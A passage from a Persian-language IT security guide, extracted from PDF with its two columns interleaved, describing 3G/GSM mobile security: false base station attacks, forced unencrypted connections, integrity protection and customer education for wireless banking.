‫ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠﻲ‪ ١٧٩‬ﺍﻧﺠﺎﻡ ﮔﺮﻓﺖ‪ .‬ﺩﺭ ﺍﻳـﻦ ﻣﻜـﺎﻧﻴﺰﻡ‬ ‫ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ ﭘﺮﺑﻬﺎ ﻭ ﻳﺎ ﭘﺮﻣﺨﺎﻃﺮﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪ .‬ﺗﻤﺎﻡ ﺍﺗﺼﺎﻻﺕ‬
‫ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺷﻤﺎﺭﺓ ﺗﻮﺍﻟﻲ ﺑﻪ ﺩﺍﺩﻩﻫـﺎﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬ ‫‪ - IVR‬ﺍﺯ ﺟﻤﻠــﻪ ﺷــﻤﺎﺭﻩ ﺗﻠﻔــﻦ ﺗﻤــﺎﺱﮔﻴﺮﻧــﺪﻩ ﻭ ﺗﺮﺗﻴــﺐ‬
‫ﺍﺿﺎﻓﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﺪ ﺩﺳﺘﮕﺎﻩ ﺳﻴﺎﺭ ﺧﻮﺍﻫﺪ‬ ‫ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺗﻮﺳﻂ ﻣﺸﺘﺮﻱ ﺑﺎﻳﺪ ﺛﺒﺖ ﺷﻮﺩ؛ ﺍﻣـﺎ ﺍﻳـﻦ‬
‫ﺗﻮﺍﻧﺴﺖ ﺷﺒﻜﻪ ﺭﺍ ﻣﻮﺭﺩ ﺷﻨﺎﺳﺎﻳﻲ ﻗﺮﺍﺭ ﺩﻫﺪ‪.‬‬ ‫ﺛﺒﺘﻬﺎ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﻧﺒﺎﻳﺪ ﺷﺎﻣﻞ ‪ PIN‬ﻭ ﺍﻃﻼﻋﺎﺕ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‬
‫ﻃﻮﻝ ﻛﻠﻴﺪ ﺭﻣـﺰ ﺍﻓـﺰﺍﻳﺶ ﻳﺎﻓﺘـﻪ ﺗـﺎ ﺍﻣﻜـﺎﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬ ‫•‬ ‫ﻣﺸﺘﺮﻱ ﮔﺮﺩﺩ‪.‬‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻗﻮﻳﺘﺮ ﻫﻢ ﻓﺮﺍﻫﻢ ﺷﻮﺩ‪.‬‬
‫ﺁﻣﻮﺯﺵ ﻣﺸﺘﺮﻱ‬
‫ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻳﻲ ﺑـﺮﺍﻱ ﺑﻬﺒـﻮﺩ ﺍﻣﻨﻴـﺖ ﺩﺍﺧـﻞ ﺷـﺒﻜﻪﻫـﺎ ﻭ‬ ‫•‬
‫ﺑﺎﻧﻜﻬﺎ ﺑﺎﻳﺪ ﻣﺼﺮﻑﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻲﺳـﻴﻢ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﻟﺤﺎﻅ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺭﺍ ﺑﻪ ﺭﻭﺷﻬﺎﻱ ﺯﻳﺮ ﺁﻣﻮﺯﺵ ﺩﻫﻨﺪ‪:‬‬

‫‪176 Stored Value Accounts‬‬


‫‪177 Close Proximity Wireless Payments‬‬
‫‪179 False Base Station‬‬ ‫‪178 Mobile Interactive Voice Response‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٩٤‬‬

‫ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﺣﻤﻼﺕ ﻗﺎﺑﻞ ﻗﻴﺎﺱ ﺑﺎ ﺣﻤﻼﺗﻲ ﭼﻮﻥ ﺍﺭﺳﺎﻝ‬ ‫ﺍﻣﻨﻴﺖ ﺑﻪ ﺟﺎﻱ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﻣﺒﺘﻨـﻲ ﺑـﺮ ﺳـﻮﺋﻴﭻ ﺷـﺪﻩ‬ ‫•‬
‫ﭘﺎﺭﺍﺯﻳﺘﻬﺎﻱ ﺭﺍﺩﻳﻮﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺍﮔﺮ ﺑﺨـﻮﺍﻫﻴﻢ ﺁﻧﻬـﺎ ﺭﺍ ﺩﺭ ﺗﻤـﺎﻡ‬ ‫)ﻣﺜﻞ ‪ .(GSM‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﺗﺼﺎﻻﺕ ﻣﻴـﺎﻥ ﺍﻳـﺴﺘﮕﺎﻩ ﺛﺎﺑـﺖ ﻭ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﺩﻳﻮﻳﻲ ﺧﻨﺜﻲ ﻛﻨﻴﻢ‪ ،‬ﺑﺎ ﻣـﺸﻜﻼﺕ ﺯﻳـﺎﺩﻱ ﺭﻭﺑـﺮﻭ‬ ‫ﺳﻮﺋﻴﭻ ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﻫﺴﺘﻴﻢ‪.‬‬ ‫ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻫﻮﻳﺖ ﭘﺎﻳﺎﻧﻪ )‪ ١٨٠(IMEI‬ﺑﺠـﺎﻱ‬ ‫•‬
‫ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ‪ GSM‬ﻭﺟﻮﺩ ﺩﺍﺷﺖ‪ ،‬ﺍﺯ ﻧﻮ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺍﺟﺒﺎﺭ ﺑﻪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﻣﺰ ﻧﺸﺪﻩ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺗﻌﺮﻳﻒ ﻧـﺸﺪﻩ‪ ،‬ﺍﻣـﺎ ﺭﺍﻫﻨﻤـﺎﻳﻲ‬ ‫•‬
‫ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻠﻪ ﻧﻴﺰ ﺑﻪ ﻳـﻚ ﺍﻳـﺴﺘﮕﺎﻩ ﺛﺎﺑـﺖ ﻳـﺎ ﺍﻳـﺴﺘﮕﺎﻩ ﺳـﻴﺎﺭ‬
‫ﺑﺮﺍﻱ ﺍﻧﺘﺨﺎﺏ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﻧﻴﺎﺯ ﺩﺍﺭﺩ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ ﻛﺎﺭﺑﺮ ﻣﻮﺭﺩ ﻧﻈﺮ ﺑـﻪ ﺍﻳـﺴﺘﮕﺎﻩ‬
‫ﺛﺎﺑﺖ ﺟﻌﻠﻲ ﺍﻋﺘﻤﺎﺩ ﻣﻲﻛﻨﺪ‪ ،‬ﻣﻬﺎﺟﻢ ﻗﺮﺑـﺎﻧﻲ ﺭﺍ ﺑـﺎ ﻳـﻚ ﺗﻤـﺎﺱ‬ ‫ﻼ ﺑـﻴﻦ ‪ GSM‬ﻭ‬ ‫ﺩﺭ ﺯﻣﺎﻥ ﮔﺸﺖﺯﺩﻥ ﻣﻴﺎﻥ ﺷﺒﻜﻪﻫﺎ‪ ،‬ﻣﺜ ﹰ‬ ‫•‬
‫ﺗﻠﻔﻨﻲ ﻣﺨﺎﻃﺐ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪ .‬ﻛﺎﺭﺑﺮ ﻧﻴﺰ ﺭﻭﺍﻝ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺍﻭﻟﻴـﻪ ﺭﺍ‬ ‫‪ ،3GPP‬ﺗﻨﻬﺎ ﺳﻄﺤﻲ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ ﻛـﺎﺭﺕ‬
‫‪ -‬ﻛﻪ ﻣﻬﺎﺟﻢ ﻣﻴﺎﻥ ﺷﺒﻜﺔ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﺓ ﺧﺪﻣﺎﺕ ﻭ ﺍﻭ ﺑﺮﻗﺮﺍﺭ ﻛـﺮﺩﻩ‬ ‫ﻫﻮﺷﻤﻨﺪ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻛـﺎﺭﺕ‬
‫‪ -‬ﺁﻏﺎﺯ ﻣﻲﻛﻨﺪ ﻭ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻋﻨﺎﺻﺮ ﺍﺭﺳﺎﻝ ﺳﻴﮕﻨﺎﻟﻬﺎ ﻃﻮﺭﻱ‬ ‫ﻫﻮﺷــﻤﻨﺪ ‪ GSM‬ﺩﺭ ﺷــﺒﻜﻪ ‪ 3GPP‬ﺩﺭ ﺑﺮﺍﺑــﺮ ﺣﻤﻠــﺔ‬
‫ﺗﻐﻴﻴﺮ ﻛﻨﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺷﺒﻜﻪ ﺍﻳﻨﻄﻮﺭ ﺑﻨﻈﺮ ﺑﺮﺳﺪ ﻛﻪ ﮔﻮﻳﻲ ﻛـﺎﺭﺑﺮ‬ ‫ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠـﻲ ﻫﻤﭽﻨـﺎﻥ ﻣـﻮﺭﺩ ﻣﺤﺎﻓﻈـﺖ ﻗـﺮﺍﺭ‬
‫ﻣﻮﺭﺩ ﻧﻈﺮ ﻧﻤﻲﺧﻮﺍﻫﺪ ﺩﺭ ﺗﺒﺎﺩﻝ ﺩﺍﺩﻩﻫـﺎ ﺍﺯ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ‬ ‫ﻧﺪﺍﺭﺩ‪.‬‬
‫ﻛﻨﺪ‪ .‬ﭘﺲ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،‬ﻣﻬﺎﺟﻢ ﺍﺭﺗﺒـﺎﻁ ﺧـﻮﺩ ﺑـﺎ ﻛـﺎﺭﺑﺮ ﺭﺍ‬ ‫ﺳﻴﺴﺘﻢ ﻧﺴﻞ ﺳﻮﻡ ﻧﺴﺒﺖ ﺑـﻪ ﻫﻤﺘـﺎﻱ ‪ GSM‬ﺧـﻮﺩ ﺍﺯ ﺍﻣﻨﻴـﺖ‬
‫ﻗﻄﻊ ﻣـﻲﻛﻨـﺪ ﻭ ﺑـﺎ ﺣـﻖﺍﺷـﺘﺮﺍﻙ ﺁﻥ ﻛـﺎﺭﺑﺮ‪ ،‬ﺍﺯ ﺷـﺒﻜﻪ ﺑـﺮﺍﻱ‬ ‫ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ .‬ﺍﻟﺒﺘﻪ ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﮔﻔﺘـﻪ ﺷـﺪ‬
‫ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺳﻬﺎﻱ ﺟﻌﻠﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬ ‫ﻫﻮﺷﻤﻨﺪﻱ ﻭ ﺯﻳﺮﻛﻲ ﻣﻬﺎﺟﻤﻴﻦ ﺭﺍ ﻫﻴﭽﮕـﺎﻩ ﻧﺒﺎﻳـﺪ ﺩﺳـﺖ ﻛـﻢ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺟﺎﻣﻌﻴﺖ ﭘﻴﺎﻣﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳـﻦ ﻧـﻮﻉ‬ ‫ﮔﺮﻓﺖ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﺯ ﺩﻳﺪ ﻣﺒﺘﻨﻲ ﺑﺮ ﺗﺌﻮﺭﻱ‪ ،‬ﺩﺭ ﺷـﺒﻜﻪﻫـﺎﻱ ﻧـﺴﻞ‬
‫ﺣﻤﻠﻪ ﻣﻨﺠـﺮ ﺷـﻮﺩ‪ .‬ﺑﻄـﻮﺭ ﺧـﺎﺹ‪ ،‬ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺩﺍﺩﻩﻫـﺎ ﻭ‬ ‫ﻼ ﺑﻪ ﺁﻧﻬﺎ‬
‫ﺳﻮﻡ ﻧﻴﺰ ﺍﻣﻜﺎﻥ ﻭﻗﻮﻉ ﺣﻤﻼﺕ ﺟﺪﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺫﻳ ﹰ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﺭﺳﺎﻝ ﻏﻴﺮﻣﺴﺘﻘﻴﻢ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺍﺗﺼﺎﻝ‪ ،‬ﺑﻪ ﺷﺒﻜﻪ‬ ‫ﺍﺷﺎﺭﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺍﻋﺘﺒﺎﺭ ﺩﺭﺧﻮﺍﺳـﺘﻬﺎﻱ ﻣـﺸﺮﻭﻉ ﺭﺍ ﺗـﺸﺨﻴﺺ‬
‫ﻱ ﭘﻴﺎﻣﻬﺎﻱ ﺣﻔﺎﻇﺖﺷﺪﺓ ﺟﺎﻣﻌﻴـﺖ ﺩﺭ‬ ‫ﺩﻫﺪ‪ .‬ﺑﻌﻼﻭﻩ ﺍﺭﺳﺎﻝ ﺩﻭﺭﻩﺍ ﹺ‬ ‫ﺍﻋﺘﻤﺎﺩ ﺑﻪ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠﻲ‬
‫ﻃﻮﻝ ﻳﻚ ﺍﺗﺼﺎﻝ‪ ،‬ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺳﺮﻗﺖ ﺍﺗـﺼﺎﻻﺕ ﺭﻣﺰﻧـﺸﺪﻩ‬ ‫ﺍﻳﻦ ﺣﻤﻠﻪ‪ ،‬ﺣﻤﻠﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﻳﺎ ﺍﻳـﺴﺘﮕﺎﻩ‬
‫ﭘﺲ ﺍﺯ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻭﻟﻴﺔ ﺍﺗﺼﺎﻝ ﻛﻤﻚ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺳـﺮﻗﺖ‬ ‫ﺳﻴﺎﺭ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻭ ﺍﺯ ﺍﻳﻦ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻱ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺍﺗﺼﺎﻝ ﻣﻴـﺎﻥ ﭘﻴﺎﻣﻬـﺎﻱ ﺩﻭﺭﻩﺍﻱ ﺣﻔـﺎﻇﺘﻲ ﻧﻴـﺰ ﻣﻤﻜـﻦ ﺍﺳـﺖ‪،‬‬ ‫ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﺭﺑﺮ ﺑﻪ ﻳـﻚ ﺍﻳـﺴﺘﮕﺎﻩ ﺛﺎﺑـﺖ ﺟﻌﻠـﻲ‬
‫ﻻ ﭼﻨﺪﺍﻥ ﺑﻜﺎﺭ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﻧﻤـﻲﺁﻳـﺪ‪ .‬ﺑﻄـﻮﺭ ﻛﻠـﻲ‬‫ﻫﺮﭼﻨﺪ ﻣﻌﻤﻮ ﹰ‬ ‫ﻣﺘﺼﻞ ﺷﻮﺩ‪ .‬ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠﻲ ﻣﻲﺗﻮﺍﻧﺪ ﮔﺎﻫﻲ ﺩﺭ ﻧﻘﺶ‬
‫ﺍﺗﺼﺎﻻﺗﻲ ﻛﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺁﻧﻬﺎ ﻏﻴﺮﻓﻌﺎﻝ ﺍﺳﺖ ﻫﻤﻴـﺸﻪ ﺩﺭ ﺑﺮﺍﺑـﺮ‬ ‫ﺗﻜﺮﺍﺭﻛﻨﻨﺪﻩ ﻭ ﮔﺎﻫﻲ ﻧﻴﺰ ﺩﺭ ﻧﻘﺶ ﺗﻘﻮﻳـﺖﻛﻨﻨـﺪﺓ ﺩﺭﺧﻮﺍﺳـﺘﻬﺎﻱ‬
‫ﺩﺳﺘﻪﺍﻱ ﺍﺯ ﺣﻤﻼﺕ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ‪.‬‬ ‫ﺗﺒــﺎﺩﻟﻲ ﻣﻴــﺎﻥ ﺷــﺒﻜﻪ ﻭ ﻛــﺎﺭﺑﺮ ﻋﻤــﻞ ﻛﻨــﺪ‪ ،‬ﻭ ﺩﺭ ﺍﻳــﻦ ﻣﻴــﺎﻥ‬
‫ﻣﺠﺪﺩﹰﺍ ﺍﻳﻦ ﻧﻜﺘﻪ ﺭﺍ ﻳﺎﺩﺁﻭﺭﻱ ﻣﻲﻛﻨﻴﻢ ﻛﻪ ﺍﻳﻦ ﻗﺒﻴﻞ ﺣﻤﻼﺕ ﺑـﺮ‬ ‫ﺩﺭﺧﻮﺍﺳﺘﻬﺎ ﻳﺎ ﭘﻴﺎﻣﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ‪.‬‬
‫ﺍﺳﺎﺱ ﺍﻳﻨﻜﻪ ﻓﻨﺎﻭﺭﻱ ﭼﮕﻮﻧﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴـﺮﺩ ﻫﻤﮕـﻲ‬ ‫ﻣﻌﻤﺎﺭﻱ ﺍﻣﻨﻴﺘﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺩﺳﺘﻜﺎﺭﻱ ﭘﻴﺎﻣﻬﺎﻱ ﺗﺒـﺎﺩﻟﻲ ﻣﻴـﺎﻥ‬
‫ﺟﻨﺒﺔ ﺗﺌﻮﺭﻱ ﺩﺍﺭﻧﺪ‪ .‬ﺩﺭ ﻛﻞ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧـﺴﻞ ﺳـﻮﻡ ﺍﺯ ﻟﺤـﺎﻅ‬ ‫ﺷﺒﻜﻪ ﻭ ﻛﺎﺭﺑﺮ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﺪ‪ .‬ﺣﻔﺎﻇـﺖ ﺍﺯ ﺟﺎﻣﻌﻴـﺖ ﭘﻴﺎﻣﻬـﺎﻱ‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻣﻨﻴﺘﻲ ﭘﻴﺸﺮﻓﺖ ﻛﺮﺩﻩﺍﻧﺪ‪ ،‬ﺍﻣﺎ ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺍﻣﻨﻴـﺖ‬ ‫ﺣﻴﺎﺗﻲ ﺷﺒﻜﻪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺑﻪ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻭﻗـﻮﻉ ﺑﺮﺧـﻲ ﺣﻤـﻼﺕ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﺳﻴﺎﺭ‪ ،‬ﻻﺯﻣﺴﺖ ‪ ،‬ﺳﺎﻳﺮ ﻣﺮﺍﻗﺒﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﺑﺼﻮﺭﺕ‬ ‫ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ‪ -‬ﻛﻪ ﺑﺎ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴﺮ ﺩﺭ ﻣﺤﺘﻮﺍﻱ ﭘﻴﺎﻡ ﺻـﻮﺭﺕ‬
‫ﻣﺪﺍﻭﻡ ﺭﻋﺎﻳﺖ ﺷﻮﻧﺪ‪.‬‬ ‫ﻣﻲﮔﻴﺮﺩ ‪ -‬ﻧﻴﺰ ﻛﻤﻚ ﻛﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺠﺎ‪ ،‬ﺣﻤﻠـﺔ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ‬
‫ﺗﻨﻬﺎ ﺗﺎ ﺯﻣﺎﻧﻲ ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺩﺍﻣـﻪ ﻳﺎﺑـﺪ ﻛـﻪ ﻧﻔـﻮﺫﮔﺮ ﻓﻌـﺎﻝ ﺑﺎﺷـﺪ؛‬
‫ﺑﺮﺧﻼﻑ ﺣﻤﻼﺕ ﺑﺎﻻ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﭘﺎﻳﺎﻥ ﺩﺧﺎﻟﺖ ﻧﻔﻮﺫﮔﺮ ﻫﻢ ﺍﺩﺍﻣﻪ‬

‫‪180 Integrity Mechanisms for the Terminal Identity‬‬


‫‪١٩٥‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺳﻴﺎﺭ ﺣﻴﺎﺗﻲﺗﺮ ﻣﻲ ﺷﻮﺩ‪ .‬ﺳﺎﺯﮔﺎﺭﻱ ﺭﻭﺯﺍﻓﺰﻭﻥ ﻧﻬﺎﺩﻫﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ‬ ‫ﻧﺘﻴﺠﻪﮔﻴﺮﻱ‬ ‫ﺯ‪.‬‬


‫ﺑﺎ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ ﻭ ﻓﻨﺎﻭﺭﻱ ‪ GSM‬ﺑﺎﻋـﺚ ﺗـﻀﻌﻴﻒ‬
‫ﺑﺎﻳﺪ ﮔﻔﺖ ﻛﻪ ﻫﺮ ﭼﻪ ﺷﺒﻜﻪﻫﺎ ﺑﻴﺸﺘﺮ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺑﺎﺷﻨﺪ‪ ،‬ﻗﺎﺑﻠﻴـﺖ‬
‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﺭﻳﺎﻓﺖ ﻭ ﭘﺮﺩﺍﺧـﺖ ﺷـﺪﻩ‪ ،‬ﻭ ﺍﻳـﻦ ﺩﺭﺣـﺎﻟﻲ‬
‫ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻭ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻣﺠـﺎﺯ ﺩﺭ ﺁﻧﻬـﺎ ﺑﻴـﺸﺘﺮ ﻣـﻲﺷـﻮﺩ‪.‬‬
‫ﺍﺳــﺖ ﻛــﻪ ﺍﻳــﻦ ﻭﺍﺳــﻄﻬﺎﻱ ﻧﻔﻮﺫﭘــﺬﻳﺮ ﺍﺳﺎﺳ ـﹰﺎ ﺑــﺮﺍﻱ ﺗﺒــﺎﺩﻝ‬
‫ﻻ ﺩﺭ ﻧﻘﺎﻃﻲ ﺍﺳﺖ ﻛﻪ‬ ‫ﺑﻴﺸﺘﺮﻳﻦ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻣﻌﻤﻮ ﹰ‬
‫ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻃﺮﺍﺣﻲ ﻧﺸﺪﻩ ﺑﻮﺩﻧـﺪ‪ .‬ﺩﺭ ﻫﻤﺎﻧﺤـﺎﻝ ﻛـﻪ‬
‫ﻛﺎﺑﻠﻬﺎﻱ ﻓﻴﺒﺮ‪ ،‬ﺳﻴﻤﻬﺎﻱ ﻣﺴﻲ‪ ،‬ﻣﺎﻫﻮﺍﺭﻩ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻲﺳـﻴﻢ‬
‫ﮔﺮﺍﻳﺸﻬﺎﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺩﺍﻣﻪ ﻣﻲﻳﺎﺑـﺪ‪" ،‬ﻣـﺪﻳﺮﻳﺖ‬
‫ﺯﻣﻴﻨﻲ ﺑﻪ ﻫﻢ ﻣﺘﺼﻞ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻭﺍﺳﻄﻬﺎﻱ ﻫﻮﺍﻳﻲ‬
‫ﺶﺭﻭ ﺑﺮﺍﻱ ﺻﻨﻌﺖ ﺑﺎﻧﻜﺪﺍﺭﻱ‬ ‫ﻣﺨﺎﻃﺮﺍﺕ ﺳﻴﺎﺭ" ﻧﻴﺰ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﭘﻴ ﹺ‬
‫ﻳﻜــﻲ ﺍﺯ ﻣﺜﺎﻟﻬــﺎﻱ ﻣﺨــﺎﺑﺮﺍﺕ ﻣــﺪﺭﻥ ﻭ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﻓﻨــﺎﻭﺭﻱ‬
‫ﺍﻫﻤﻴﺖ ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ﺧﻮﺍﻫﺪ ﻳﺎﻓﺖ‪.‬‬
‫ﺍﻃﻼﻋﺎﺕ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻮﺭﺩ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪.‬‬
‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﭘﻠﺘﻦ ﻣﺮﺝ‪ ١٨١‬ﺍﺷﺎﺭﻩ ﻛﺮﺩﻩ‪" ،‬ﺍﻳﻦ ﮔـﺮﺍﻳﺶ ﺑـﺎﺯﺍﺭ ﺑـﻪ‬
‫ﺗﺪﺍﻭﻡ ﺍﺭﺗﻘﺎﻱ ﻛﻴﻔﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻳﻜﭙﺎﺭﭼﺔ ﻭﺍﺳﻂﻫﺎ ﺑـﻮﺩﻩ ﻛـﻪ‬
‫ﺍﻣﻜﺎﻥ ﺍﺗﺼﺎﻝ ﺑﻲﻋﻴﺐ ﻭ ﻧﻘﺺ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﻣﺜـﻞ ﻓﻴﺒـﺮ‪،‬‬
‫ﺳﻴﻤﻬﺎﻱ ﻣﺴﻲ‪ ،‬ﺑﻲ ﺳﻴﻢ ﺯﻣﻴﻨﻲ‪ ،‬ﻣـﺎﻫﻮﺍﺭﻩ ﻭ ﺩﻳﮕـﺮ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ‬
‫ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﺭﺍ ﻓﺮﺍﻫﻢ ﻛﺮﺩﻩ‪ ،‬ﺍﻣﺎ ﭼﺎﻟﺶ ﺁﻧﺠﺎ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳـﺪ ﻛـﻪ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺑﺨﻮﺍﻫﻴﻢ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﺗﻬﻴﻪ ﻛﻨﻴﻢ ﻛﻪ ﺩﺭ ﻋﻴﻦ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ‬
